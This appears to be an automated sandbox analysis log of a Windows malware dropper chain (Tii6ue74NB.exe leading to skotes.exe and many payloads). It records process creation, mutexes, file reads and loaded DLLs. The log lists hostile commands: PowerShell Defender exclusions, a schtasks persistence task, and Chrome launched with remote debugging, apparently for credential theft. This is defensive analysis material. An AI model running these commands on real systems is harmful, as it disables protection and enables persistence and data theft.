                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeMutant created: \Sessions\1\BaseNamedObjects\My_mutex
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8156:120:WilError_03
                              Source: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4484:64:WilError_03
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeFile created: C:\Users\user\AppData\Local\Temp\IXP000.TMPJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeCommand line argument: Kernel32.dll0_2_00DF2BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeCommand line argument: Kernel32.dll1_2_00622BFB
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeCommand line argument: Kernel32.dll2_2_003E2BFB
                              Source: Tii6ue74NB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exeSystem information queried: HandleInformation
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeFile read: C:\Users\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeFile read: C:\Windows\System32\drivers\etc\hosts
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                              Source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                              Source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                              Source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                              Source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                              Source: 3m20j.exe, 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                              Source: 3m20j.exe, 0000000A.00000002.2512609278.000000006BFDF000.00000002.00000001.01000000.00000019.sdmp, 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                              Source: 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
                              Source: 3m20j.exe, 0000000A.00000003.2196395570.0000000005E85000.00000004.00000020.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2112912435.0000000005AB6000.00000004.00000800.00020000.00000000.sdmp, 5813f66ed1.exe, 0000000C.00000003.2113895382.0000000005A9D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                              Source: 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                              Source: 3m20j.exe, 0000000A.00000002.2510690067.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, 3m20j.exe, 0000000A.00000002.2500736671.0000000005F91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                              Source: 2i7672.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: 3m20j.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                              Source: unknownProcess created: C:\Users\user\Desktop\Tii6ue74NB.exe "C:\Users\user\Desktop\Tii6ue74NB.exe"
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe
                              Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe "C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe"
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,9356535502589347400,8547874231582347487,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1664 -s 872
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HIDGCFBFBF.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HIDGCFBFBF.exe "C:\Users\user\Documents\HIDGCFBFBF.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2288,i,6769742919243767367,11351755421190753691,262144 /prefetch:8
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe "C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe"
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe "C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6440 -s 1884
                              Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe "C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\P0D95.exeProcess created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\2i7672.exeJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\1I15f6.exeProcess created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe "C:\Users\user\AppData\Local\Temp\1017623001\5813f66ed1.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe "C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe "C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe "C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe "C:\Users\user\AppData\Local\Temp\1017629001\d689b693b2.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe "C:\Users\user\AppData\Local\Temp\1017630001\d0b5a60121.exe" Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: unknown unknownJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""Jump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\3m20j.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\HIDGCFBFBF.exe"Jump to behavior
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2276 --field-trial-handle=2208,i,9356535502589347400,8547874231582347487,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017624001\941d08ea4f.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
                              Source: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exeProcess created: C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe "C:\Users\user\AppData\Local\Temp\1017625001\fc1570cd0d.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017626001\ae64e67a81.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ucjptbx"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData"
                              Source: C:\Users\user\AppData\Local\Temp\1017627001\3800cab1bc.exeProcess created: C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe "C:\ucjptbx\d1a239d4e2ee4a8aa1443a088d48cd64.exe"
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Documents\HIDGCFBFBF.exe "C:\Users\user\Documents\HIDGCFBFBF.exe"
                              Source: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exeProcess created: C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe "C:\Users\user\AppData\Local\Temp\1017628001\7ab555facf.exe"
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=2288,i,6769742919243767367,11351755421190753691,262144 /prefetch:8
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: cabinet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: feclient.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: advpack.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: textinputframework.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: coreuicomponents.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: coremessaging.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\Tii6ue74NB.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: aclayers.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\i9z22.exeSection loaded: sfc_os.dllJump to behavior
